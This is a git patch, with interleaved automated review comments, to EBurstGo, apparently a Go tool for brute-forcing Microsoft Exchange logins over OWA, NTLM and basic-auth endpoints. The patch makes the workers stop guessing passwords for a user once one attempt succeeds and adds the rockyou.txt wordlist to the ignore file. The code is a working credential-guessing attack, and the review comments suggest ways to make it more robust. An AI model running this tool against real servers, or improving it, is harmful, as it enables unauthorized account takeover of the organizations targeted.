From 86e99755b4cb2cf8cc2b731a79cd8cf13350e210 Mon Sep 17 00:00:00 2001
From: X1r0z
Date: Thu, 10 Aug 2023 00:19:37 +0800
Subject: [PATCH] =?UTF-8?q?fix:=20=E7=88=86=E7=A0=B4=E6=88=90=E5=8A=9F?= =?UTF-8?q?=E5=90=8E=E7=A8=8B=E5=BA=8F=E4=BB=8D=E5=9C=A8=E8=BF=90=E8=A1=8C?= =?UTF-8?q?=E7=9A=84=E9=97=AE=E9=A2=98?=
MIME-Version: 1.0
Content-Type: text/plain; charset=UTF-8
Content-Transfer-Encoding: 8bit
修复爆破某一账户成功后程序仍在运行的问题
---
 .gitignore | 1 +
 README.md | 1 +
 lib/basicbrute.go | 9 ++++++-
 lib/httpbrute.go | 9 ++++++-
 lib/ntlmbrute.go | 10 +++++--
 lib/run.go | 66 +++++++++++++++++++++++++++++++----------------
 6 files changed, 70 insertions(+), 26 deletions(-)
diff --git a/.gitignore b/.gitignore
index fdb5e4f..aa54ada 100644
--- a/.gitignore
+++ b/.gitignore
@@ -3,4 +3,5 @@ EBurstGo
 user.txt
 pass.txt
+rockyou.txt
 dist/
diff --git a/README.md b/README.md
index 55de656..98194c2 100644
--- a/README.md
+++ b/README.md
@@ -81,4 +81,5 @@ $ ./EBurstGo -url https://192.168.30.11 -domain hack-my.com -userf user.txt -pas
 ```
 todo
+- 开启代理爆破一段时间会出现 `connection refused`, 待解决
 - `/powershell` 接口 (Kerberos 认证) 待支持
\ No newline at end of file
diff --git a/lib/basicbrute.go b/lib/basicbrute.go
index 219f7c6..551d0cb 100644
--- a/lib/basicbrute.go
+++ b/lib/basicbrute.go
@@ -8,14 +8,21 @@ import (
 func BasicBruteWorker(info *TaskInfo) {
 for data := range info.task {
+ if info.done.GetDone() {
+ break
+ }
 username, password := data[0], data[1]
 Log.Debug("[*] 尝试: %v:%v", username, password)
 req, _ := http.NewRequest("OPTIONS", info.u, nil)
 req.SetBasicAuth(info.domain+"\\"+username, password)
 req.Header.Add("Connection", "close")
- res, _ := Client.Do(req)
+ res, err := Client.Do(req)
+ if err != nil {
+ panic(err)
+ }
 if res.StatusCode != 401 && res.StatusCode != 408 && res.StatusCode != 504 {
 Log.Success("[+] 成功: %v", username+":"+password)
+ info.done.SetDone()
 } else {
 Log.Failed("[-] 失败: %v", username+":"+password)
 }
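Review bot: The added `panic(err)` after `Client.Do(req)` in BasicBruteWorker turns one transport error into a crash of the whole process, because an unrecovered panic in any worker goroutine terminates the program before the runner reaches its `wg.Wait()` and the elapsed-time log; the same lines were added in HttpBruteWorker (lib/httpbrute.go) and NtlmBruteWorker (lib/ntlmbrute.go). A worker in a library package should report the error and leave its loop in an orderly way, for example `if err != nil { Log.Failed("[-] request error: %v", err); return }`. In the lines visible here `res.Body` is never closed after the status check; unless the part of the loop body outside the hunk does it, add `res.Body.Close()` once the status has been read. The loop body continues past the end of the hunk.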
diff --git a/lib/httpbrute.go b/lib/httpbrute.go
index af11294..df69f6f 100644
--- a/lib/httpbrute.go
+++ b/lib/httpbrute.go
@@ -18,6 +18,9 @@ func HttpBruteWorker(info *TaskInfo) {
 referer, _ := url.JoinPath(info.targetUrl, "/owa/auth/logon.aspx?replaceCurrent=1&url="+refUrl)
 for data := range info.task {
+ if info.done.GetDone() {
+ break
+ }
 username, password := data[0], data[1]
 Log.Debug("[*] 尝试: %v:%v", username, password)
 form := url.Values{
@@ -36,13 +39,17 @@ func HttpBruteWorker(info *TaskInfo) {
 req.Header.Set("Cookie", "PrivateComputer=true; PBack=0")
 req.Header.Set("Connection", "close")
- res, _ := Client.Do(req)
+ res, err := Client.Do(req)
+ if err != nil {
+ panic(err)
+ }
 location := res.Header.Get("Location")
 if location == "" {
 Log.Failed("[-] 失败: %v", username+":"+password)
 } else if !strings.Contains(location, "reason") {
 Log.Success("[+] 成功: %v", username+":"+password)
+ info.done.SetDone()
 } else {
 Log.Failed("[-] 失败: %v", username+":"+password)
 }
diff --git a/lib/ntlmbrute.go b/lib/ntlmbrute.go
index 989be98..eda6298 100644
--- a/lib/ntlmbrute.go
+++ b/lib/ntlmbrute.go
@@ -10,6 +10,9 @@ import (
 func NtlmBruteWorker(info *TaskInfo) {
 for data := range info.task {
+ if info.done.GetDone() {
+ break
+ }
 username, password := data[0], data[1]
 Log.Debug("[*] 尝试: %v:%v", username, password)
@@ -28,10 +31,13 @@ func NtlmBruteWorker(info *TaskInfo) {
 }
 req, _ := http.NewRequest("GET", info.u, nil)
 req.SetBasicAuth(info.domain+"\\"+username, password)
- res, _ := client.Do(req)
-
+ res, err := client.Do(req)
+ if err != nil {
+ panic(err)
+ }
 if res.StatusCode != 401 && res.StatusCode != 408 && res.StatusCode != 504 {
 Log.Success("[+] 成功: %v", username+":"+password)
+ info.done.SetDone()
 } else {
 Log.Failed("[-] 失败: %v", username+":"+password)
 }
diff --git a/lib/run.go b/lib/run.go
index e6af71d..8b44b14 100644
--- a/lib/run.go
+++ b/lib/run.go
@@ -12,9 +12,27 @@ type TaskInfo struct {
 u string
 domain string
 task chan []string
+ done *DoneFlag
 delay int
 }
+type DoneFlag struct {
+ mu sync.RWMutex
+ done bool
+}
+
+func (c *DoneFlag) GetDone() bool {
+ c.mu.RLock()
+ defer c.mu.RUnlock()
+ return c.done
+}
+
+func (c *DoneFlag) SetDone() {
+ c.mu.Lock()
+ defer c.mu.Unlock()
+ c.done = true
+}
+
 type BruteWorker func(info *TaskInfo)
 func BruteRunner(targetUrl string, mode string, domain string, userDict []string, passDict []string, n int, delay int, worker BruteWorker) {
@@ -24,38 +42,42 @@ func BruteRunner(targetUrl string, mode string, domain string, userDict []string
 Log.Info("[*] 使用 %v 接口爆破: %v", mode, targetUrl)
 Log.Info("[*] 用户名:%v 密码:%v 共计:%v", len(userDict), len(passDict), len(userDict)*len(passDict))
- task := make(chan []string, len(userDict)*len(passDict))
-
- info := &TaskInfo{
- targetUrl: targetUrl,
- mode: mode,
- u: u,
- domain: domain,
- task: task,
- delay: delay,
- }
-
 t1 := time.Now()
 for _, username := range userDict {
+
+ task := make(chan []string, len(passDict))
+ done := &DoneFlag{done: false}
+
+ info := &TaskInfo{
+ targetUrl: targetUrl,
+ mode: mode,
+ u: u,
+ domain: domain,
+ task: task,
+ done: done,
+ delay: delay,
+ }
+
 for _, password := range passDict {
 data := []string{username, password}
 task <- data
 }
- }
- close(task)
- var wg sync.WaitGroup
+ close(task)
- for i := 0; i < n; i++ {
- wg.Add(1)
- go func() {
- defer wg.Done()
- worker(info)
- }()
- }
+ var wg sync.WaitGroup
+
+ for i := 0; i < n; i++ {
+ wg.Add(1)
+ go func() {
+ defer wg.Done()
+ worker(info)
+ }()
+ }
- wg.Wait()
+ wg.Wait()
+ }
 t2 := time.Now()
 Log.Info("[*] 耗时: %v", t2.Sub(t1))
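Review bot: The new exported type `DoneFlag` and its methods `GetDone` and `SetDone` carry no doc comments, and the getter name goes against the Go convention of dropping the `Get` prefix. I would add `// DoneFlag is a one-way flag, safe for concurrent use, that a worker sets after it logs a success for the current task queue.` above the type and a one-line comment on each method. Because the state is a single boolean that only moves from false to true, `atomic.Bool` from `sync/atomic` (Go 1.19+) could replace the `RWMutex` and reduce both method bodies to `Load()` and `Store(true)`, provided the module's Go version allows it, which this patch does not show.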
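Review bot: In the rewritten loop of BruteRunner, `done := &DoneFlag{done: false}` spells out the zero value; `done := &DoneFlag{}` says the same with less noise. The loop body now builds the queue, the `TaskInfo` and the worker pool for one user inline, which makes the function hard to scan; moving that body into an unexported helper called once per `username` would leave BruteRunner with the setup, the loop and the timing log. A short comment at that point should state that the channel and the flag are created per user on purpose, so the flag set for one account apparently does not end the work queued for the next. BruteRunner begins before this hunk, so the setup of `u` is not visible here.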